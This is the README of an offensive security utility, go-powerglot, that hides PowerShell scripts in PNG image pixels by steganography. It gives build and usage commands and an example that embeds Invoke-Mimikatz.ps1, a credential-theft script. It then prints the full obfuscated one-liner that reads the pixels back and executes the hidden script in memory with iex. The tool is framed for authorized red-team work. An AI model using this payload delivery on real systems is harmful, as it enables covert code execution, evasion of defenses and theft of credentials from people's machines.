# go-powerglot

`go-powerglot` is an offensive security utility that embeds PowerShell scripts into PNG images using pixel-level steganography. It transforms ordinary PNG files into covert script carriers and provides a one-liner PowerShell payload for in-memory script extraction and execution. Inspired by [https://github.com/peewpw/Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage)

> **WARNING**: This tool is intended for **authorized security assessments only**. Misuse may violate laws or regulations. The author disclaims any responsibility for unlawful use. Always obtain explicit permission before conducting any security tests.

## Features

- **Steganography**: Embeds PowerShell script bytes into image pixels using RGB channel manipulation.
- **PowerShell Payload Generator**: Automatically generates a one-liner that decodes and executes the script from the PNG image.
- **Portable**: Single binary with no external dependencies beyond Go's standard library.
- **File Size & Dimension Checks**: Ensures the image has sufficient capacity to store the entire script.

## Installation

### Prerequisites

- **Go**: Version 1.21 or later.
- **Make**: For building with the provided Makefile.
- **Git**: To clone the repository.

### Steps

- Clone the repository:

```
$ git clone https://cgit.heqnx.com/go-powerglot
$ cd go-powerglot
```

- Install dependencies:

```
$ go mod tidy
```

- Build for all platforms:

```
$ make all
```

- Binaries will be generated in the build/ directory for Linux, Windows, and macOS; alternatively, build for a specific platform:

```
$ make linux-amd64
$ make windows-amd64
$ make darwin-arm64
```

- (Optional) Run directly with Go:

```
$ go run main.go -exec </path/to/png> -image </path/to/input.png> -out </path/to/out.png> -script </path/to/input.ps1>
```

## Usage

### Command-Line Flags

```
Usage of ./go-powerglot:
  -exec string
        execution path to be used inside the generated PowerShell one-liner
  -image string
        input PNG file to embed the script into
  -out string
        output PNG file with embedded script
  -script string
        PowerShell script file to embed
```

## Examples

### Embed a PowerShell script into a PNG and generate a decoder:

```
$ ./go-powerglot \
    -image img/windows-11-5689x2400.png \
    -script Invoke-Mimikatz.ps1 \
    -out test.png \
    -exec C:\Users\Public\test.png
```

- Example output:

```
[inf] script size: 3625037 bytes
[inf] image size: 2702073 bytes
[inf] png dimensions: 5689x2400
[inf] created output file: /home/heqnx/go-powerglot/test.png
[inf] successfully embedded Invoke-Mimikatz.ps1 into test.png
[inf] powershell decoder snippet:
sal a new-object;add-type -a system.drawing;$g=a system.drawing.bitmap("C:\Users\Public\test.png");$o=a byte[] 13653600;(0..2399)|%{foreach($x in 0..5688) {$p=$g.getpixel($x,$_);$o[$_*5689+$x]=[math]::floor(($p.r -band 0x0f)*16) + ($p.g -band 0x0f);}};$g.dispose();iex([system.text.encoding]::ascii.getstring($o[0..3625036]))
```

- Use the generated PowerShell snippet to decode and execute the embedded script:

- The PowerShell snippet uses pixel decoding logic to reconstruct the original script in memory and execute it using `iex`.

## Disclaimer

`go-powerglot` is provided "as is" without any warranties. The author and contributors are not responsible for damages or misuse. This tool is for research and authorized red team operations only.

## License

This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the [LICENSE](LICENSE) file for more details.